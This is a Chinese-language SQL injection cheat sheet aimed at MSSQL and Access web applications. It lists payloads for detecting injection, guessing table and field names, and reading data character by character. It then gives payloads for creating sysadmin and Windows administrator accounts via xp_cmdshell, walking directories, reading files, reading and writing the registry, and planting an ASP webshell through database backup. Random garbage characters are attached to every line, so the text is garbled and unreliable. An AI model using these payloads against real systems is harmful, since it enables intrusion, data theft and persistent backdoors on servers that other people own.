1.判断是否有注入;and 1=1 ;and 1=2 iY�
@MnnX
2.初步判断是否是mssql ;and user>0 h`��X>b/V�
�vM�BF7Jfx
3.注入参数是字符'and [查询条件] and ''=' ?2D��1gjr�
�D@��:w�/W
4.搜索时没过滤参数的'and [查询条件] and '%25'=' q$>��/~aVM
F2�QX� �^*
5.判断数据库系统 W-�9?|ei��
!KiN} ���p
;and (select count(*) from sysobjects)>0 mssql ��iC�]=S}�
FGzMbi<l#(
;and (select count(*) from msysobjects)>0 access +�S!gS|8�P
>_9w4g_�<�
[d+f#�\ut
L��`v7|!�X
6.猜数据库 ;and (select Count(*) from [数据库名])>0 *�aKT&5Ch-
US��<�bM@[
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 p�
BU,"Yy&
b(<#n6�a}\
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 q�}v�z]L&o
[~cb&6|M�
9.(1)猜字段的ascii值(access) �>>}4b�2�U
f|�e�Upf%)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 kjW��Y{7b!
~&bn}
M�>W
(2)猜字段的ascii值(mssql) Fbx�r�B�M�
#:E}Eby/6I
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �<=fYz^|XT
���.L;M-`^
10.测试权限结构(mssql) )HP�t(C�k
rkw^�R�W�^
I�Ls���w'�
tYE\tbCO'�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �!��/pE6)a
t?&�
a?6:J
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 1=f�P68n��
S�!*wK���-
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -rC�_8.u :
'��)ZM#
:G
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �D[d�+lq#p
*;(��wtM�g
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- r`? �bYo�z
���19.�+"H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- N_A���Ah�D
SJ/($3GkBd
;and 1=(select IS_MEMBER('db_owner'));-- rGPFPsMQ]�
C'�4gve 7!
ANuIPF4NxP
�1Yj�^N"�=
11.添加mssql和系统的帐户 +&t`"l�Rl&
e�C+S'J�gf
;exec master.dbo.sp_addlogin username;-- �Qx$C���oY
;exec master.dbo.sp_password null,username,password;-- �9 F"2�$�;
I)@��b�#V=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- zT;F4_p3G-
+�k�@$�C,A
;exec master.dbo.xp_cmdshell 'net user username password :a��YbP,mE
z)z_]�c-X+
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��.2y�2Qm�
&� �,KxE(C
;exec master.dbo.xp_cmdshell 'net user username password /add';-- !3�]}3jZ.
!3Xu#^X�xj
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- A�Q�C�U\E�
�zR)9]p�J-
KW&5&�~�)2
J�|v�ri�I;
12.(1)遍历目录 �Qyn~Vu�43
7#\\Ava$T�
;create table dirs(paths varchar(100), id int) lO?d�I=}�]
�r�lQ4��+~
;insert dirs exec master.dbo.xp_dirtree 'c:\' aTJs.y�-I~
?�V3kIb��
;and (select top 1 paths from dirs)>0 ;xp^F�KP�
+mc0:e{W�F
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) f@:.bp8VB8
-Xm/sq(i)%
N{6
-��r�R
$:�v!*�0/
(2)遍历目录 ��e�!+_U C
�H�zd�t��R
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- #;l~�Y}�7'
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 o�kl�*�pA)
/e�Z UAx�q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �b�:OQ���/
�n2<�#]2h�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 +YS0yTWe�X
��Ebmd[A&&
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6xL�LIb�y,
'"�#��W�!p
zUw=e�}�?:
e��
MX�?x7
13.mssql中的存储过程 =D��1�%-ym
��Hch��h2
xp_regenumvalues 注册表根键, 子键 KW1��7CJ@�
��b�f9LR�1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 "m�BX$t'gb
"YUh4uZ~P�
xp_regread 根键,子键,键值名 -F��&4<\=+
1 �uKWvp0\
;exec xp_regread '?�WKKYD7N
j��HP6d =
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
�Fo�$�kD(
O!Rw�?�
Y
xp_regwrite 根键,子键, 值名, 值类型, 值 (5-4`:�1ux
#M9r�t��~4
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 w�OhiC$E46
Vh%=JL
s�K
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Lm-�yTMNPn
�F��ZUN*5`
xp_regdeletevalue 根键,子键,值名 WfnBWSA2�T
5*Wo�/�%#q
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 m�[k@\xS4e
y.p��wj~s
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 $�)V_oQSqn
,qo"�i7c{:
hcQky/c\#b
,5tW|=0@��
14.mssql的backup创建webshell �m^6& !`CD
�-F�l;;jeX
use model y@\R�$`0J�
8�&gr}r-
5
create table cmd(str image); #n9�:8B�Kf
-!p� +^w�C
insert into cmd(str) values (''); �W,\��LdQ�
��g�~>�g])
backup database model to disk='c:\l.asp'; DU@ZL��k�3
�%��Ls5:Z=
-d|Q|zF^x
L)��0j���&
15.mssql内置函数 ����b.Yl0Y
nD�t1oM
H
;and (select @@version)>0 获得Windows的版本号 %��f�v;C
]\�fX��y?2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa A7��|CG[wZ
PNjZb�OmzS
;and (select user_name())>0 爆当前系统的连接用户 �8�$c_M �
nUgZ�]ag=G
;and (select db_name())>0 得到当前连接的数据库 9>@@W#T�K~
ZmJ!ZKKc�h
�_8-iO.T+2
Z= 'DV1A$,
16.简洁的webshell ��UUE:>[,�
c�^4^z"Mo`
use model k^��x[(�gw
R� ��F)Qsa
create table cmd(str image); �WcG!�6.U>
F|rJ{�=x
�
insert into cmd(str) values (''); ;q�8tOv��Q
R�{G�T?
wl
backup database model to disk='g:\wwwtest\l.asp';
